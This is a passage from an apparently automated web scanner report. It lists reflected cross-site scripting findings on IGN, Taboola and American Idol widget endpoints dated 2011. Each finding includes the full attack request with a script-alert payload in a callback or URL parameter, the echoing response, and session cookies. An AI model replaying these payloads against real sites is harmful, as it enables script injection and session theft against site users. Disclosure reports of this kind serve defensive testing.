jsonp13177588132575b910<script>alert(1)</script>c36337bda10({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"Beverly Hills","settings":{"notifyOnWallPostReceived":"true","notifyOnFollowerReceived":"false","notifyOnLevelEarned":"false"},"type":"
...[SNIP]...

1.75. http://social-services.ign.com/v1.0/social/rest/people/fedreg.233293577/@self [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://social-services.ign.com
Path:   /v1.0/social/rest/people/fedreg.233293577/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload f8a1e<script>alert(1)</script>bc7f5a60105 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.233293577/@self?jsonp=jsonp1317758813258f8a1e<script>alert(1)</script>bc7f5a60105&_=1317758816915 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-03.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 1291
Date: Tue, 04 Oct 2011 20:10:05 GMT

jsonp1317758813258f8a1e<script>alert(1)</script>bc7f5a60105({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"Hollywood, CA","settings":{"notifyOnWallPostReceived":"true","notifyOnFollowerReceived":"true","notifyOnLevelEarned":"true"},"type":"St
...[SNIP]...

1.76. http://social-services.ign.com/v1.0/social/rest/people/fedreg.259795679/@self [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://social-services.ign.com
Path:   /v1.0/social/rest/people/fedreg.259795679/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 61ce5<script>alert(1)</script>09d15fd1a01 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.259795679/@self?jsonp=jsonp131775881325661ce5<script>alert(1)</script>09d15fd1a01&_=1317758816914 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-02.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 1931
Date: Tue, 04 Oct 2011 20:10:09 GMT

jsonp131775881325661ce5<script>alert(1)</script>09d15fd1a01({"startIndex":0,"count":1,"totalResults":1,"entry":[{"settings":{"notifyOnWallPostReceived":"true","notifyOnReviewCommentReceived":"true","notifyOnBlogCommentReceived":"true","notifyOnFollowerReceived
...[SNIP]...

1.77. http://social-services.ign.com/v1.0/social/rest/people/fedreg.78864510/@self [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://social-services.ign.com
Path:   /v1.0/social/rest/people/fedreg.78864510/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 47838<script>alert(1)</script>c6cbbc461de was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.78864510/@self?jsonp=jsonp131775881325547838<script>alert(1)</script>c6cbbc461de&_=1317758816913 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-04.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 2287
Date: Tue, 04 Oct 2011 20:10:05 GMT

jsonp131775881325547838<script>alert(1)</script>c6cbbc461de({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"San Francisco","settings":{"notifyOnWallPostReceived":"false","notifyOnFollowerReceived":"false","notifyOnLevelEarned":"false"},"type":
...[SNIP]...

1.78. http://social-services.ign.com/v1.0/social/rest/people/nickname.Interoceter%20/@self [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://social-services.ign.com
Path:   /v1.0/social/rest/people/nickname.Interoceter%20/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3f36f<script>alert(1)</script>a1470682ff0 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/nickname.Interoceter%20/@self?jsonp=jsonp13177588132543f36f<script>alert(1)</script>a1470682ff0&_=1317758816912 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-01.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 2183
Date: Tue, 04 Oct 2011 20:10:03 GMT

jsonp13177588132543f36f<script>alert(1)</script>a1470682ff0({"startIndex":0,"count":1,"totalResults":1,"entry":[{"location":"Sector 7G","settings":{"notifyOnWallPostReceived":"true","notifyOnFollowerReceived":"true","notifyOnLevelEarned":"true"},"type":"Standa
...[SNIP]...

1.79. http://support.igninsider.com/ics/support/default.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://support.igninsider.com
Path:   /ics/support/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64259"><script>alert(1)</script>720bddf44f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ics/support/default.asp?deptID=3233&64259"><script>alert(1)</script>720bddf44f0=1 HTTP/1.1
Host: support.igninsider.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://support.igninsider.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 04 Oct 2011 22:06:22 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ParaturePortalSessionID=adaaa4e5%2D1241%2D4dd7%2D94cb%2De8cd8f657c71; path=/
Set-Cookie: ParaturePortalDeptID=3233; path=/
Vary: Accept-Encoding
Content-Length: 4128


<HTML>
<HEAD>
<!-- ****** PRODAPP6-A ****** -->
<base href="http://support.igninsider.com/ics/support/" />
<!--<script src="../ic1Browser.js"></script>-->
<script type="text/javascript" src="/i
...[SNIP]...
<frame title="Left Navigation" name="cypLeft" src="KBFolder.asp?deptID=3233&64259"><script>alert(1)</script>720bddf44f0=1" marginheight=0 marginwidth=0 scrolling=auto>
...[SNIP]...

1.80. http://trc.taboolasyndication.com/ign-askmen/trc/2/json [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /ign-askmen/trc/2/json

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 94d18<script>alert(1)</script>d13c2880044 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ign-askmen/trc/2/json?tim=15%3A09%3A48.950&publisher=ign-askmen&pv=2&list-size=8&list-id=rbox-t2v&id=207&uim=article-horizontal&intent=u&uip=article-horizontal&external=http%3A%2F%2Fwww.askmen.com%2F&llvl=1&item-id=http%3A%2F%2Faskmen.com%2Ftop_10%2Fcars%2Ffastest-cars-in-the-world.html&item-type=text&item-url=http%3A%2F%2Faskmen.com%2Ftop_10%2Fcars%2Ffastest-cars-in-the-world.html&page-id=510356a1b27a2568a0a5b8d38eba109bc67661b8&cv=4-9-8-49662-3734132&uiv=default&cb=TRC.callbacks.recommendations_194d18<script>alert(1)</script>d13c2880044 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=ae7f02b7-d8fc-4e74-9744-efca878a3ea7

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Tue, 04 Oct 2011 20:31:49 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_1b0243f9d09f45382ea41ba6067243cc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1317760243_1317760309;Path=/ign-askmen/
Set-Cookie: JSESSIONID=.prod2-f2;Path=/
Set-Cookie: taboola_wv=;Path=/ign-askmen/;Expires=Wed, 03-Oct-12 20:31:49 GMT
Content-Length: 4358

TRC.callbacks.recommendations_194d18<script>alert(1)</script>d13c2880044({"trc":{"req":"e56e6f775f9c2e0da624f1b80e049cb8","session-id":"1b0243f9d09f45382ea41ba6067243cc","session-data":"v1_1b0243f9d09f45382ea41ba6067243cc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1317760243_131
...[SNIP]...

1.81. http://widgets.ign.com/disqus/comment/comment/ign-articles/1197949.jsonp [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.ign.com
Path:   /disqus/comment/comment/ign-articles/1197949.jsonp

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4c39a<script>alert(1)</script>cd50f099a7e was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /disqus/comment/comment/ign-articles/1197949.jsonp?category=xboxlive&url=http%3A%2F%2Fxboxlive.ign.com%2Farticles%2F119%2F1197949p1.html&title=The+Top+25+Xbox+Live+Arcade+Games&callback=jsonp13177659042454c39a<script>alert(1)</script>cd50f099a7e&_=1317765942525 HTTP/1.1
Host: widgets.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; rsi_segs=; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 2976
Accept-Ranges: bytes
X-Varnish: 1916941308
Expires: Tue, 04 Oct 2011 22:05:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 22:05:16 GMT
Connection: close

jsonp13177659042454c39a<script>alert(1)</script>cd50f099a7e("<script type=\"text\/javascript\">var cssNode = document.createElement('link');cssNode.type = 'text\/css';cssNode.rel = 'stylesheet';cssNod
...[SNIP]...

1.82. http://widgets.ign.com/global/page/followus.jsonp [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.ign.com
Path:   /global/page/followus.jsonp

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 844f6<script>alert(1)</script>5e7756dfe2d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /global/page/followus.jsonp?locale=us&layout=right_rail&callback=jsonp1317765904246844f6<script>alert(1)</script>5e7756dfe2d&_=1317765951425 HTTP/1.1
Host: widgets.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1769
Accept-Ranges: bytes
X-Varnish: 1916941921
Expires: Tue, 04 Oct 2011 22:05:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 22:05:20 GMT
Connection: close

jsonp1317765904246844f6<script>alert(1)</script>5e7756dfe2d("<script type=\"text\/javascript\">var cssNode = document.createElement('link');cssNode.type = 'text\/css';cssNode.rel = 'stylesheet';cssNod
...[SNIP]...

1.83. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90673'><script>alert(1)</script>58610e30d1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js90673'><script>alert(1)</script>58610e30d1f/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:15 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js90673'><script>alert(1)</script>58610e30d1f/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=13177
...[SNIP]...

1.84. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7dd22'><script>alert(1)</script>127ff36c659 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity7dd22'><script>alert(1)</script>127ff36c659/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:17 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity7dd22'><script>alert(1)</script>127ff36c659/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.85. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
Path:   /js/recentActivity/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97b0e'><script>alert(1)</script>6b191eb13af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view97b0e'><script>alert(1)</script>6b191eb13af?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:19 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view97b0e'><script>alert(1)</script>6b191eb13af?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.86. http://widgets.myidol.americanidol.com/js/recentActivity/view [cookieFailInstantRedirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.myidol.americanidol.com
